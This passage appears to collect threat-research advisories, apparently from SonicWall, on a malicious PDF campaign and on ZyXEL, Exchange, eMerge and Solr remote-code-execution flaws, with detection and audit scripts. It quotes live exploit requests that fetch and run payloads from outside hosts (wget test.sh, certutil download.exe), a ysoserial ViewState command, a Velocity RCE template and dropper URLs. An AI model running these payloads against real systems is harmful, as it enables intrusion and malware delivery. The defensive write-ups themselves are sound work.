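short key). Example code written for this write-up, not part of the sample;
the array, rotation count and keys below are constructed."""
import base64


def rc4_codepoints(text: str, key: str) -> str:
    """RC4 over code points, mirroring the sample's charCodeAt/fromCharCode
    loop: key scheduling, then XOR each code point with the keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
    out = []
    i = j = 0
    for ch in text:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(ch) ^ S[(S[i] + S[j]) % 256]))
    return "".join(out)


def decode_entry(b64_cipher: str, key: str) -> str:
    """The sample's three steps: atob(), percent-encode every byte and
    decodeURIComponent (i.e. UTF-8 decode), then RC4 with the call-site key."""
    padded = b64_cipher + "=" * (-len(b64_cipher) % 4)  # atob() tolerates missing '='
    cipher_chars = base64.b64decode(padded).decode("utf-8")
    return rc4_codepoints(cipher_chars, key)


def encode_entry(plain: str, key: str) -> str:
    """Inverse of decode_entry (RC4 is symmetric); used here only to build
    the constructed fixture below."""
    cipher_chars = rc4_codepoints(plain, key)
    return base64.b64encode(cipher_chars.encode("utf-8")).decode("ascii")


def rotate_array(entries: list, rotations: int) -> list:
    """Mirror of the bootstrap loop `while (--n) arr.push(arr.shift())`:
    each iteration moves the first entry to the end. Note the pre-decrement:
    a call with n performs n-1 rotations, so count them before using this."""
    rotations %= len(entries)
    return entries[rotations:] + entries[:rotations]


def resolve(rotated: list, index_literal: str, key: str) -> str:
    """One call such as _0x2b74('0x11', '!1TB'): hex index into the rotated
    array, then decrypt that entry with the per-call key."""
    return decode_entry(rotated[int(index_literal, 16)], key)


# Constructed fixture: three plaintexts of the kind such loaders hide
# (property names used by the anti-bot checks), each under its own key.
SAMPLE_PLAIN = ["userAgent", "HeadlessChrome", "webdriver"]
SAMPLE_KEYS = ["!1TB", "Ahlb", "(9JT"]
SAMPLE_ROTATIONS = 2  # constructed; the real count comes from the sample's bootstrap
SAMPLE_ARRAY = [encode_entry(p, k) for p, k in zip(SAMPLE_PLAIN, SAMPLE_KEYS)]


def recover_strings(array: list, rotations: int, call_sites: list) -> dict:
    """Decode every (index_literal, key) pair collected from the script and
    map each call site back to its cleartext."""
    rotated = rotate_array(array, rotations)
    return {(idx, key): resolve(rotated, idx, key) for idx, key in call_sites}


if __name__ == "__main__":
    # After 2 left rotations, stored entry 2 sits at index 0, entry 0 at 1, entry 1 at 2.
    calls = [("0x0", "(9JT"), ("0x1", "!1TB"), ("0x2", "Ahlb")]
    for site, clear in recover_strings(SAMPLE_ARRAY, SAMPLE_ROTATIONS, calls).items():
        print(f"_0x2b74('{site[0]}', '{site[1]}') -> {clear!r}")
```

In practice the call sites are harvested from the script with a regex over `_0x2b74('0x..', '....')` occurrences; once every entry is resolved, the anti-debugging gates, the `HeadlessChrome`/`callPhantom`/`webdriver` checks and the redirect target become readable without executing the page.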

When no debugger is attached and no bot is detected, the script redirects the user to the page shown below, which delivers the payload "new toeic reading test.exe" to the victim. Different payloads are delivered depending on the input passed in the URL.

At the bottom of the PDF, more such malicious PDF links are provided. We observe various PDFs in this format hosted on the compromised web pages. The first malicious file in this campaign was observed on 2020-01-05 (hash: E684AEEAA0F12D415C0EF321341BCF2FF0CBE7B3099EFC8A2E99B49794F337D9) and over 20,000 unique malicious PDFs in this format have been collected in VirusTotal in the last 6 months.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 6075 RobotInstall.PD

GAV: 5313 Malagent.N_69

IOCs:

PDF

hxxp://abeautypageants.com/uploads/1/3/0/4/130477064/tawesa_metumiwi.pdf
hxxp://andrewgouldmusic.com/uploads/1/3/0/5/130551623/dijumuzu.pdf
hxxp://gooebuttercakes.com/uploads/1/3/0/5/130550825/desosi-fuzivekok.pdf
hxxp://skyhutchison89.com/uploads/1/3/0/4/130483981/wasakufoturulumowob.pdf
hxxp://mepalparish.org/uploads/1/3/0/5/130551962/308871.pdf
hxxp://springbloomhealth.net/uploads/1/3/0/5/130588533/puzevubezaxudip-zikitaza-jiraxiri-sixotijisa.pdf
hxxp://turnerhallmedia.com/uploads/1/3/0/7/130738507/putolumeka.pdf
hxxp://cannabisusa.world/uploads/1/3/0/3/130313090/dulivizexifekoxoseva.pdf
hxxp://bydaff.com/uploads/1/3/0/9/130969768/1870408.pdf
hxxp://pwinthtwe.com/uploads/1/3/0/3/130379841/tavulesad.pdf
hxxp://magicaladventurestravelbystacy.com/uploads/1/3/0/7/130776561/nikovadato-matoxop-woposowogewitu-vetazujugigisu.pdf
hxxp://mta-sts.lavwcd.com/uploads/1/3/0/6/130640097/xamidezetufef.pdf
hxxp://cristinmcintyre.com/uploads/1/3/0/3/130323635/mowena.pdf
hxxp://beringsearestaurant.com/uploads/1/3/0/2/130272347/5798288.pdf
hxxp://ag-one.com/uploads/1/3/1/4/131437737/gedanisinena.pdf
hxxp://borgproduction.fr/uploads/1/3/0/3/130379634/7c6c5.pdf

html/javascript:

hxxp://mercyministrystl.org/uploads/1/3/0/6/130621669/130621669.html
hxxp://beeidentification.com/uploads/1/3/0/6/130605420/130605420.htmlnew+toeic+reading+test
hxxp://homefromhomebandbwinchester.com/uploads/1/3/0/6/130620251/130620251.htmlpoldark+season+5+episode+3+recap
hxxp://galibellesue.com/uploads/1/3/0/6/130604986/130604986.htmltexto+informativo+sobre+los+animales+en+peligro+de+extinci%C3%B3n
hxxp://southbayreiki.com/uploads/1/3/0/6/130639956/130639956.htmlcartea+mortilor+film+online+subtitra
hxxp://2averagedudes.com/uploads/1/3/0/6/130604402/130604402.htmlrussian+keyboard+download+windows+10

Payload dropper:

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=teamviewer+free++version+9.+0&s1=1m2dj0iak20d
Teamviewer : dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=new+toeic+reading+test&s1=191vbjoak560
dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Payload:

dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Attacker IP:

104.27.181.152 - hxxp://ttraff.cc

Hosting server IP (Weebly):

199.34.228.54
199.34.228.59
199.34.228.100
199.34.228.71

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication using the weblogin.cgi program. This program fails to properly sanitize the username parameter passed to it. If the username parameter contains an OS command, it allows command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the hits below more often as attackers scan for vulnerable devices. The request sends the command "ls" in the username parameter; a vulnerable device returns without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the HTTP GET request below, which attempts to download a shell script to the /tmp directory, execute the shell script "test.sh", and afterwards remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on Shodan shows a few hundred affected ZyXEL NAS devices exposed online.
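A log-side check for the request shapes shown above, added here as an example and not part of SonicWall's signatures: it parses constructed access-log lines, decodes the username parameter of weblogin.cgi requests and flags values that contain shell metacharacters. The log lines, the script-name match and the metacharacter set are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines in common log format (not real traffic); the
# first two reproduce the request shapes quoted in the write-up above.
SAMPLE_LOG = """\
62.171.171.24 - - [10/Mar/2020:10:01:02 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 200 512
62.171.171.24 - - [10/Mar/2020:10:01:05 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1" 200 77
10.0.0.5 - - [10/Mar/2020:10:02:00 +0000] "GET /cgi-bin/weblogin.cgi?username=alice&password=hunter2 HTTP/1.1" 200 3120
10.0.0.6 - - [10/Mar/2020:10:02:30 +0000] "POST /cgi-bin/weblogin.cgi HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Characters that let a value break out of a shell command; none belong in a
# login name (assumed set; a site with apostrophes in user names may relax it).
SHELL_META = re.compile(r"[;|&`$'\"]")


def injected_username(target):
    """Return the decoded username when a weblogin.cgi request carries shell
    metacharacters in it, else None. Only GET query strings are visible in an
    access log; POST bodies are not recorded, so POST variants need IPS/WAF."""
    path, _, query = target.partition("?")
    if not path.endswith("weblogin.cgi"):   # prefix varies, match the script name
        return None
    # parse_qs splits on '&' only and percent/plus-decodes each value, so an
    # encoded %3B becomes ';' only after the parameter boundaries are fixed.
    params = parse_qs(query, keep_blank_values=True, separator="&")
    for username in params.get("username", []):
        if SHELL_META.search(username):
            return username
    return None


def scan_log(text):
    """Return (source_ip, timestamp, decoded_username) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "GET":
            username = injected_username(m["target"])
            if username is not None:
                hits.append((m["src"], m["ts"], username))
    return hits


if __name__ == "__main__":
    for src, ts, username in scan_log(SAMPLE_LOG):
        print(f"{ts} {src} weblogin.cgi command injection attempt: {username!r}")
```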

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates are available for NAS products that have reached end-of-support; users of those products are advised not to leave them directly exposed to the internet. If possible, connect them behind a security router or firewall for additional protection.

Find the vendor advisory here

IOC:

Attacker IPs:

Hackers are actively trying to exploit vulnerable Microsoft Exchange Servers

SonicWall Capture Labs Threat Research team observes attackers actively probing for vulnerable Microsoft Exchange servers.

Vulnerability | CVE-2020-0688:

A remote code execution vulnerability has been reported in Microsoft Exchange Server. The weakness is due to the server failing to create unique keys at installation time. Microsoft Exchange Server does not randomly generate a key for each installation; instead, all installations of Microsoft Exchange Server include the same validationKey and decryptionKey values in web.config. Knowledge of the static key allows an authenticated attacker with a mailbox to trick the server into deserializing maliciously crafted data.

Exploitation:

  • Exchange User Account Takeover:

This is a crucial step in leveraging this vulnerability, as compromising an Exchange user account would allow an attacker to take over the vulnerable Microsoft Exchange Server. As a result, attackers try to locate exposed, vulnerable Outlook Web Application instances using search engines such as Shodan, and then try to authenticate through credential stuffing. In this stage, attackers take sets of credentials that have been leaked through data breaches or other means, then attempt to use them to log in to an Exchange account.

  • Retrieve Session Information:

External users who connect to Outlook on the web (OWA) also have access to the ECP for their own options page. ECP (Exchange Control Panel) is the web-based management console in Exchange Server. After an Exchange user account has been taken over, the attackers log in to the Exchange Control Panel, i.e. "https://<ServerFQDN>/ecp", to retrieve ViewStateGenerator and ViewStateUserKey from the authenticated session.

The ValidationKey is already known to attackers, as vulnerable versions of Exchange Server use the same static key "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" as validationKey and SHA1 as the validation algorithm.

  1. ViewStateGenerator - retrieved from the authenticated session.
  2. ViewStateUserKey - retrieved from the authenticated session.
  3. ValidationKey - static for vulnerable servers.
  4. ValidationAlg - known for vulnerable servers.

  • Generate ViewState Payload:

The next step is to create a ViewState payload. Many ASP.NET websites use ViewState to exchange the state of controls on a page between the client and the server to achieve statefulness. ViewState, a base64-encoded serialized parameter, is posted back from the client to the server within the body of the page via a hidden parameter called __VIEWSTATE. This parameter is deserialized on the server side to retrieve the data. With all the retrieved information, attackers create a ViewState payload using .NET exploit tools, as shown below.

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c <malicious code>
--validationalg="SHA1" --validationkey=<Validationkey> --generator=<ViewStateGenerator>
--viewstateuserkey=<ViewStateUserKey> --isdebug --islegacy

  • Remote Code Execution:

After successfully generating the ViewState payload, attackers perform remote code execution by submitting the following URL to the vulnerable Exchange server.

https://<ServerFQDN>/ecp/default.aspx?__VIEWSTATEGENERATOR=<ViewStateGenerator>&__VIEWSTATE=<CraftedViewStatePayload>

Patch:

Find the vendor advisory here

Microsoft patched this vulnerability in February 2020 by randomizing the cryptographic keys at install time.
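A way to check an Exchange server's web.config for the static key quoted above, added here as an example (not Microsoft's or SonicWall's tooling): it reports whether any <machineKey> element still carries the known CVE-2020-0688 validationKey, which is what the February 2020 patch replaces with a per-install random value. The web.config fragments are constructed and their decryptionKey values are placeholders.

```python
import xml.etree.ElementTree as ET

# Static validationKey shipped in vulnerable Exchange builds (value quoted above).
STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

# Constructed web.config fragments, not copied from any real server; the
# decryptionKey values are placeholders.
VULNERABLE_WEB_CONFIG = """\
<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="PLACEHOLDER-DECRYPTION-KEY-0000000000"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""
# A per-install key (constructed value) such as the February 2020 patch generates.
PATCHED_WEB_CONFIG = """\
<configuration>
  <system.web>
    <machineKey validationKey="7A11C0B3F4D9E28561AA0C3D19B7E5F2C4D8A6E0B1F39D57"
                decryptionKey="PLACEHOLDER-DECRYPTION-KEY-1111111111"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""


def machine_keys(web_config_xml):
    """Return the attributes of every <machineKey> element. A web.config can
    hold more than one, since a <location> block may override <system.web>."""
    root = ET.fromstring(web_config_xml)
    return [dict(elem.attrib) for elem in root.iter("machineKey")]


def assess_web_config(web_config_xml):
    """Classify the config: 'static' if the known CVE-2020-0688 key is present
    anywhere, 'explicit' if only other fixed keys are set, 'autogenerate' if
    no fixed validationKey is configured (ASP.NET then generates one itself)."""
    status = "autogenerate"
    for mk in machine_keys(web_config_xml):
        vk = mk.get("validationKey", "AutoGenerate").strip().upper()
        if vk == STATIC_VALIDATION_KEY:
            return "static"          # ViewState MAC forgeable by any mailbox user
        if not vk.startswith("AUTOGENERATE"):
            status = "explicit"
    return status


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_WEB_CONFIG),
                       ("patched", PATCHED_WEB_CONFIG)):
        print(f"{label} web.config: validationKey status = {assess_web_config(cfg)}")
```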

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signatures:

IPS: 14826 Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)

IPS: 14825 /ecp/default.aspx Access (INFO)

IOCs (Indicators of Compromise):

Below are some of the IP addresses that SonicWall firewalls blocked:

Linear eMerge E3 access controller actively being exploited

Linear eMerge E3:

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. NSC's Linear eMerge E3 is an access controller that specifies which doors a person can use to enter and exit designated places at specified times. It runs an embedded Linux operating system and can be managed from a browser via an embedded web server. These access systems are used in commercial, industrial, banking, medical, retail, hospitality, and other businesses where users need to secure their facilities.

Vulnerability | CVE-2019-7256:

A command injection vulnerability has been reported in the eMerge E3-series access controller. The issue is caused by insufficient sanitization of user-supplied input to a PHP function, allowing arbitrary command execution with root privileges. A remote, unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application via a crafted HTTP request.

Exploit:

SonicWall Capture Labs Threat Research team observes a huge number of hits on our firewalls that attempt to exploit the command injection vulnerability with the HTTP request below.

Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.

The malware then accepts commands from its C2 server to conduct various types of DoS attacks against any given target.

Affected:

Linear eMerge Elite/Essential Firmware version 1.00-06

Impact:

As per Applied Risk's research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.

A quick search on Shodan exposes over 2000 Linear devices.

An attacker can leverage an OS command injection vulnerability to alter or corrupt a database, steal customer records, launch a distributed denial of service (DDoS) attack or even compromise other parts of the hosting infrastructure. The resulting damage is determined by the user authorizations and security protections that the organization has in place. In addition, attackers may retain access to the systems even after an organization has detected and fixed the underlying vulnerability.

Fix:
No patch available yet.
The exploitation is known to be easy, given the proof of concept code. The attack may be launched remotely and no form of authentication is required for exploitation.

Preventing this exploit may require blocking access to the vulnerable PHP script until a security patch is released, or allowing only a whitelist of permitted values.

After discovering that an OS command injection attack has taken place, it's critical to cut off access to the compromised systems from the internal networks.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14767 Linear eMerge Remote Code Execution

WAF: 9012 System Command Injection Variant 2

Heat Map:

Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most attacks being observed in the U.S.

Trend Chart:

IOCs:

We do not find these IP addresses associated with any specific threat actor; most of them are seen crawling the internet, looking for vulnerable services and attempting to brute-force and exploit IoT devices. A good number of the attacks originate from compromised devices such as webcams or DVRs, which indicates that they are infected with a Conficker- or Mirai-like malware variant.

Apache Solr vulnerabilities bound to be attacked

What is Apache Solr?

Apache Solr is a fast, open-source Java search server. Solr enables you to easily create search engines that search websites, databases and files. It has been an industry player for almost a decade and offers real-time indexing, dynamic clustering, load-balanced querying, replication, automated fail-over and recovery. Quite a few internet giants such as Netflix, eBay, Instagram, and Amazon use Solr because of its ability to index and search multiple sites.

Remote Code Execution Vulnerabilities:

CVE-2019-0193:

This vulnerability is due to the ability to remotely configure the DataImportHandler via the "/solr//dataimport" URI. When such a request is received, the handleRequestBody() method of DataImportHandler is called, which results in a call to runCmd() with the request parameters as an argument. If the command HTTP parameter is set to full-import, doFullImport() is called, which results in a call to DocBuilder.execute(), causing the XML data to be evaluated. This XML data may contain components that result in arbitrary code execution.

Exploit:

A target running a vulnerable version of Solr with the DataImportHandler plugin enabled can be exploited with the request below.

POST /solr/test/dataimport HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referrer: http://XXXX:8983/solr/test/dataimport
User-Agent: Mozilla/4.0
Content-length:
Host: XXXX:8983

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process = jav.lang.Runtime.getRuntime();
process.exec("cm d.exe /c certutil.exe -urlcache -split -f http://fk.0xbdairolkoie.space/download.exe %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe & cm d.exe /c %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe");
return row;
}
]]</script>
</dataConfig>

Mitigation:

Solr versions prior to 8.2.0 are affected by this. Updating to the latest version will resolve the issue.

CVE-2019-12409:

This vulnerability is due to an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file. If you use the default solr.in.sh file from the affected releases, JMX monitoring is enabled and exposed on RMI_PORT (default 18983) without any authentication. If this port is open for inbound traffic in your firewall, anyone with network access to your Solr nodes can access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

Exploit:

If ENABLE_REMOTE_JMX_OPTS is set to "true", attackers can execute malicious code on the server using the command below.

java -jar jython-standalone-2.7.0.jar mjet.py host 18983 install super_secret

Mitigation:
Solr versions 8.1.1 and 8.2.0 for Linux are affected by this.

This issue can be fixed by setting ENABLE_REMOTE_JMX_OPTS to 'false' on every Solr node and then restarting the Solr server, or by updating Solr to the latest version.
Blocking inbound traffic on JMX_PORT is also recommended.

Zero day (CVE not yet assigned):

Apache Solr has a remote command execution vulnerability based on Velocity templates; it is caused by the injection of Velocity templates. An attacker who can obtain a core name on the Solr server first sets params.resource.loader.enabled to true, then loads a resource and executes commands on the server.

Exploit:

Apache Solr integrates the VelocityResponseWriter plug-in by default. The params.resource.loader.enabled parameter in the plug-in's initialization controls whether the parameter resource loader may specify a template in the Solr request parameters. The default setting is false. An attacker can set params.resource.loader.enabled to true through a POST request; subsequently sending a crafted GET request can cause remote code execution on the Solr server.

The params.resource.loader.enabled option in the VelocityResponseWriter initialization parameters is turned on with the following POST request.

POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Later, attackers load a malicious template into the Solr template engine with the following GET request.

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java. lang.Runtime% 27)) +% 23set ($ chr = $ x.class.forName (% 27java.lang.Character% 27)) +% 23set ($ str = $ x.class.forName (% 27java.lang. String% 27)) +% 23set ($ ex = $ rt.getRuntime (). Exec (% 27id% 27)) + $ ex.waitFor () +% 23set ($ out = $ ex.getInputStream ()) +% 23foreach ($ i + in + [1 .. $ out.available ()]) $ str.valueOf ($ chr.toChars ($ out.read ()))% 23end HTTP / 1.1
Host: XXX:8983

Mitigation:

No fix from the vendor available yet.

Review the VelocityResponseWriter class in the solrconfig.xml configuration file and ensure the params.resource.loader.enabled value is set to false.
Also make sure the Config API is locked down; otherwise an attacker could modify solrconfig.xml.
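An added audit example (not Apache's or SonicWall's code) covering both the CVE-2019-12409 solr.in.sh setting and the Velocity params.resource.loader.enabled setting discussed above: it reads a node's solr.in.sh and its Config API output and reports which of the two weak settings are present. The solr.in.sh fragments, the Config API JSON layout and the treatment of an unset variable as false are constructed assumptions.

```python
import json
import re

# Constructed solr.in.sh fragments (not from a real node).
SOLR_IN_SH_WEAK = """\
# Enable remote JMX access on the RMI port
ENABLE_REMOTE_JMX_OPTS="true"
RMI_PORT=18983
"""
SOLR_IN_SH_FIXED = """\
ENABLE_REMOTE_JMX_OPTS="false"
RMI_PORT=18983
"""

# Constructed /solr/<core>/config responses; the "config" -> "queryResponseWriter"
# layout is assumed to match what the Config API returns for the writer above.
CONFIG_WEAK = json.dumps({"config": {"queryResponseWriter": {"velocity": {
    "class": "solr.VelocityResponseWriter", "startup": "lazy",
    "template.base.dir": "", "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"}}}})
CONFIG_FIXED = json.dumps({"config": {"queryResponseWriter": {"velocity": {
    "class": "solr.VelocityResponseWriter", "startup": "lazy",
    "params.resource.loader.enabled": "false"}}}})

JMX_RE = re.compile(r'^ENABLE_REMOTE_JMX_OPTS=["\']?(\w+)["\']?$')


def jmx_remote_enabled(solr_in_sh):
    """True when the last uncommented ENABLE_REMOTE_JMX_OPTS assignment is true.
    An unset variable is treated as false (assumed bin/solr default)."""
    value = "false"
    for line in solr_in_sh.splitlines():
        m = JMX_RE.match(line.split("#", 1)[0].strip())
        if m:
            value = m.group(1).lower()
    return value == "true"


def velocity_params_loader_enabled(config_json):
    """True when any VelocityResponseWriter has params.resource.loader.enabled=true."""
    writers = json.loads(config_json).get("config", {}).get("queryResponseWriter", {})
    for writer in writers.values():
        if not isinstance(writer, dict):
            continue
        if writer.get("class") != "solr.VelocityResponseWriter":
            continue
        if str(writer.get("params.resource.loader.enabled", "false")).lower() == "true":
            return True
    return False


def audit(solr_in_sh, config_json):
    """Return the list of findings for one Solr node (an empty list means clean)."""
    findings = []
    if jmx_remote_enabled(solr_in_sh):
        findings.append("CVE-2019-12409: ENABLE_REMOTE_JMX_OPTS=true exposes unauthenticated "
                        "JMX on RMI_PORT; set it to false, restart Solr, block the port inbound")
    if velocity_params_loader_enabled(config_json):
        findings.append("params.resource.loader.enabled=true lets request parameters supply "
                        "Velocity templates; set it to false and lock down the Config API")
    return findings


if __name__ == "__main__":
    for label, sh, cfg in (("weak", SOLR_IN_SH_WEAK, CONFIG_WEAK),
                           ("fixed", SOLR_IN_SH_FIXED, CONFIG_FIXED)):
        print(label, audit(sh, cfg) or ["no findings"])
```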

Trend Chart:

At the time of writing, we are not aware of attacks exploiting these vulnerabilities in the wild, but we have seen increasing scanning activity for ports 8983 and 18983 in the recent past. More widespread attacks on vulnerable Solr servers could be imminent.

Fig: Port activity taken from SANS Internet Storm Center: Port 8983

Fig: Port activity taken from SANS Internet Storm Center: Port 18983

Top IPs scanning port 8983:

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signatures:

IPS: 14096 Apache Solr Config API Insecure Deserialization
IPS: 14445 Apache Solr DataImportHandler Remote Code Execution 1
IPS: 14446 Apache Solr DataImportHandler Remote Code Execution 2
IPS: 14599 Apache Solr DataImportHandler Remote Code Execution 3
IPS: 14600 Apache Solr Config VelocityResponseWriter
IPS: 13036 Apache Solr Remote Code Execution 1
IPS: 13037 Apache Solr Remote Code Execution 2
IPS: 13287 Apache Solr DataImportHandler Information Disclosure
WAF: 1738 Apache Solr DataImportHandler Remote Code Execution
WAF: 1702 Apache Solr Config API Insecure Deserialization